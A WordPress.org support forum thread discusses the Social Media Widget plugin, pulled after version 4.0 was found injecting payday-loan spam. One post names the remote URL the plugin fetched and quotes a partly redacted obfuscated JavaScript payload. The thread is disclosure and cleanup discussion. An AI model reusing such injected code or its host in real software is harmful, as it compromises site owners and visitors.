WordPress.org

Ready to get started?Download WordPress

Forums

Social Media Widget
[resolved] Anyone know why Social Media Widget was removed? (30 posts)

  1. mvandemar
    Member
    Posted 1 year ago #

    I am rebuilding a client's site that was hacked, and this is one of the plugins they were using. I went to grab a fresh copy and it looks like it was yanked from the repositories some time in the past week. Does anyone happen to know why? I can still access the most recent version via downloads.wordpress.org, but I don't want to use it if it was pulled due to security concerns.

    Thanks.

    -Michael

    http://wordpress.org/extend/plugins/social-media-widget/

  2. Krishna
    Volunteer Moderator
    Posted 1 year ago #

    I think you posted a wrong link above. Try that. Which plugin out of the list there do you want to download?

  3. annoyingmouse
    Member
    Posted 1 year ago #

    Changelog of version 4.0.1 mentions removal of potentially malicious code.
    I don't know why 4.0.1 is not visible through /extend/plugins but trough /support/plugin, it is:

    http://wordpress.org/support/plugin/social-media-widget

  4. peter
    Member
    Posted 1 year ago #

    SMW 4.0 was infected. It retrieved the file contents of http://i.aaur.net/i.php which would inject the following into your pages, just after the widget:

    <script type="text/javascript">
    <!--//--><![CDATA[//><!--
    function nemoViewState(){
    var a=0,m,v,t,z,x=new 
    
    redacted
    
    t=z='';
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
    //--><!]]>
    </script>
    <p class="nemonn"><a href="http://paydaypam.co.uk/" title="Payday Loan">payday loans</a></p>

    Nemo is also discussed here: http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html.

    Version 4.0.1 of SMW does not retrieve http://i.aaur.net/i.php anymore and seems to be ok.

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    We forced an update to remove the discovered malware from already existing sites, however I highly recommend that you find another plugin.

  6. perezbox
    Member
    Posted 1 year ago #

    Like Otto states, i would not recommend using that plugin any time soon. Even if the version has been updated to address the issue, it's a big concern that it even made it into the core of the plugin at all. This tells you that there is a serious access problem for that dev.

  7. mvandemar
    Member
    Posted 1 year ago #

    @Krishna - that is the correct link. I was discussing a plugin that had been taken down, seeing a "We couldn't find that plugin." message is expected in this case.

    Everyone else, thanks. When I grabbed the download using Google's cache the version of the plugin I got was 3.3 (social-media-widget.3.3.zip). Were there any issues with that version?

    I just checked and I do not see the code referenced in it, so it is probably ok, but I will alert my client that they should probably switch. Thanks. :)

    -Michael

  8. brianfreytag
    Member
    Posted 1 year ago #

    I just want to make it clear that I have not been the maintainer of Social Media Widget since January of 2013 (version 2.9.7).

    This post is to disassociate myself with this issue. I want the record to reflect that this issue arose months after I passed off the widget and have not had SVN access since signing over the widget in January. As the original creator of Social Media Widget and beginning its legacy, I want to remain clean of this in the case I decide to release a new WordPress plugin.

    I had a discussion with the current maintainer whom I transferred the rights over to - It seems that one of the freelancers that he hired to do some updates decided to go rogue or his password was cracked, though you will have to hear it from him for the full story.

    -- Update - Changed the version I last pushed in the first paragraph

  9. Krishna
    Volunteer Moderator
    Posted 1 year ago #

    I just checked and I do not see the code referenced in it, so it is probably ok

    No, in view of what Otto stated above, I feel that you should not use the plugin and find another one in its place.

  10. annoyingmouse
    Member
    Posted 1 year ago #

    Hi Brian,

    I have a hard tibe believing what the current maintainer says. Several weeks ago, he was notified that something weird was going on in this thread: http://wordpress.org/support/topic/strange-url-in-social-widgetphp

    Since then, he didn't investigate? He didn't clean up? The code just got replaced by code that was not that easy to spot.

    Can't you take ownership of the project again?

  11. peter
    Member
    Posted 1 year ago #

    Version 3.3 contained the malware alteady - but with some different code, accessing [ redacted, really you do not have to share malware links here ]

    You can get all version of the plugin from svn ( http://plugins.svn.wordpress.org/social-media-widget )

    Version 4.0.1 is without the malicious code but like others say, best is obviously to remove this plugin plugin altogether.

  12. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    We are working with the current maintainer of the plugin to ensure that everything is good, all problems are solved, all i's dotted and all t's crossed.

    In the meantime, the plugin will remain in its current state until all the issues can be resolved with it. Speculation is unnecessary at this time. Okay? Everybody just pause until we sort it out, thanks. :)

  13. brianfreytag
    Member
    Posted 1 year ago #

    @annoyingmouse - I can't really comment on anything beyond what was said in my post. I only posted it to keep my name clean - not to speculate on the outcome.

    I have every confidence in Otto and his team to get this issue resolved the way it has to be resolved.

  14. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    The issue has been resolved and the plugin has been made available once again.

  15. mindctrl
    Member
    Posted 1 year ago #

    Otto, you forced an update onto sites to remove the malware from them? Without the admins clicking upgrade? How do you go about doing that?

  16. perezbox
    Member
    Posted 1 year ago #

    Hi Otto

    I'm having a very hard time with your latest insight.

    What insight can you provide that will help reassure plugin users that this has in fact been resolved? Speaking of which, what exactly was resolved?

    I have a hard time understanding how this is being allowed back in the repo, maybe you have all the answers you need, but allowing it back in the repo essentially tells people it's good to go and you're putting your name behind it as the approver. This is a pretty blatant abuse of trust by the author, and not much has been said from them on how it happened and how it has been adressed.

    Tony

  17. perezbox
    Member
    Posted 1 year ago #

    @mindctrl, wow, that's not what I understood from his message. Where do you see that?

  18. karenalenore
    Member
    Posted 1 year ago #

    This malicious code has embedded itself throughout my site, in core components, other plugin folders, theme files etc. If we update to the latest version, is it gonna clean up that mess or am I completely screwed. I was using this plugin on about 25 sites!! This is a nightmare.

  19. mvandemar
    Member
    Posted 1 year ago #

    @mindctrl - they can't actually update your WordPress for you, you can read more about that here if you like: WordPress and infected plugins.

    @karenalenore - while this plugin was bad, I did not see an actual back door in it when I looked, and I haven't heard of anyone else getting hit like that. The code does embed itself on every page, that is true, but it should go away once you remove the plugin. Did you remove it yet? I would be happy to take a look and see if you have anything else going on if you are still having symptoms. Just let me know.

  20. perezbox
    Member
    Posted 1 year ago #

    @karenalenore yeah I'm with @mvandemar, not seeing any evidence of this being used for what you're saying. Are you sure that is the source and you don't have other issues in your site? You might want to open a ticket in the hacked or malware tracks for help.

    Thanks

  21. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

  22. karenalenore
    Member
    Posted 1 year ago #

    Thanks all. I bet I have both problems going on simultaneously. It's hard to sort one problem from the other... Some sites have corrupted server files and folders with the injected code and some other sites have front end injected code. No two sites are alike. I was dying to figure out the common thread as they are on different servers, different accounts, use different plugins, etc.

    Thanks for the resources. I'm going to go through this one site at a time and see if I can get them clean. (There goes a whole day of productivity. blah.)

  23. mvandemar
    Member
    Posted 1 year ago #

    I was dying to figure out the common thread as they are on different servers, different accounts, use different plugins, etc

    First thing I would point out is that you are a common thread there. There are certain pc viruses that will steal passwords from your ftp client config, assuming they are stored there, and infect your sites that way. I would highly recommend that any non-Mac, non-Linux users (ie. all Windows users) who have ftp access to your sites run thorough anti-virus scans on their machines.

    Also, if an account has more than one site on it (ie. multiple sites accessible from the same ftp login) then it usually only takes a back door on one of them to infect the rest on that particular account. So, I would look for common traits between accounts as well, not just sites, if you happen to have that kind of setup going on with any of them.

  24. Blink Web Effects
    Member
    Plugin Author

    Posted 1 year ago #

    All,

    First, we are sorry that this is the first communication from us since this all started. Shortly after the spam injection commenced, our wordpress.org account was locked and we were unable to log in or post. We have only now regained access to the plugin and our account after discussions with Otto.

    We are greatly sorry for allowing this spam injection to occur. We trusted the wrong people with our plugin code and take full responsibility. We are a marketing company at heart and are not actually developers, so in order to provide major updates and improvements, we had to seek outside help. Some of these people deceived us and abused our trust and naivety. We had no idea that the malicious code was in fact malicious or could do something like this. We only went by what was told to us by those we trusted with the plugin code. We will not make this mistake again.

    We hope you can come back to SMW now that this has been cleaned up, but we understand we have a long way to go to build trust back up with the WordPress community. As of version 4.0.1, SMW is safe and spam-free, and will remain that way.

    If you need to get in touch with us, you may email us at blinkwebeffects@gmail.com

  25. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    @perezbox

    Hi Tony!

    Naturally we do take a very hard line on spam, and obviously an author putting malicious code into a plugin is enough grounds for us to bring down the ban hammer.

    But there are natural circumstances where an author may not be at fault. For example, if his password had been used by malicious persons without his knowledge, then we wouldn't hold the plugin author responsible for that, but would work with them to clean up the plugin, secure their account, and advise them on how not to let it happen again.

    In this case, the original author of the plugin and the current maintainer of the plugin have made it clear what has occurred here. Basically, the current maintainer is not a professional programmer, and put his trust in the wrong freelancers to do the coding work for him. Though he did check in the malicious code, it's clear from our communications that he was unaware of its nature. Both me and Scott have examined the current plugin code and determined that it has no malicious intent (after we removed the problem code), and it would be unfair to the users of the plugin as well as the current maintainer to have an absolute "zero-tolerance" policy for all cases.

    People make mistakes. In this case, the current owner of the plugin put his trust in the wrong place. I'm confident that he won't do that again, and regardless we'll be watching the plugin for changes. Anybody else is free to do so as well, it is easy to subscribe to the plugin changes via email, and get notified of every commit to a plugin's code.

    So the plugin is back up for now, and as long as it stays clean, it's fine. :)

  26. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    @mindctrl: I think you misunderstood my original post. We have no ability to "force" code onto other people's sites. However, we do control the plugin directory, and have the ability to change plugins and bump their version numbers. In this case, we removed the problem code from the plugin, and bumped the version number from 4.0 to 4.0.1. When we did that, sites running the plugin would have received an upgrade notice. However, those sites would still have to click the update button to get the new code.

  27. karenalenore
    Member
    Posted 1 year ago #

    @mvandemar I recognize that I am that thread. I've scanned my machines, change passwords and all but don't see how that happened from my end.

    On my Rackspace accounts, each site that used this widget showed malware and once I removed it, they seem to be scanning clean for the moment.

    On my Hostgator accounts, we have both problems. I'm still dealing with tech support to get those clean.

    One thought, I use managewp.com to manage my sites and run updates. I've been in contact with them and they assure me there is now way these problems could have originated with them. Anyone else have thoughts on that one? Should I look towards the hosts as the problem beyond this plugin's ill doings?

    I appreciate the active discussion here to commiserate my suffering, even if I have to do the work in the end. :)

  28. mvandemar
    Member
    Posted 1 year ago #

    @karenalenore - I love Hostgator, and one of the reasons is their security. I have cleaned a ton of sites for clients and never have I found an issue with them, so I would definitely not worry about it being them.

    If they are having trouble getting you cleaned, if you want I can scan one of your accounts for you, send you a list of all back doors I find. It might not tell you how the site got hit initially, but it could help them discover what they are missing on the other accounts. My site is in my profile, and there is a contact form there.

  29. perezbox
    Member
    Posted 1 year ago #

    Hi Otto

    That makes sense, every circumstance is different.

    Thanks

    Tony

  30. brianfreytag
    Member
    Posted 1 year ago #

    @karenalenore - One thing you should check is if you're using any kind of caching plugins. If you're doing disk or opcache caching of pages/posts and didn't clear the cache after removing the plugin, the whole thing or remnants of the widget will remain in place until they expire or you delete them.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic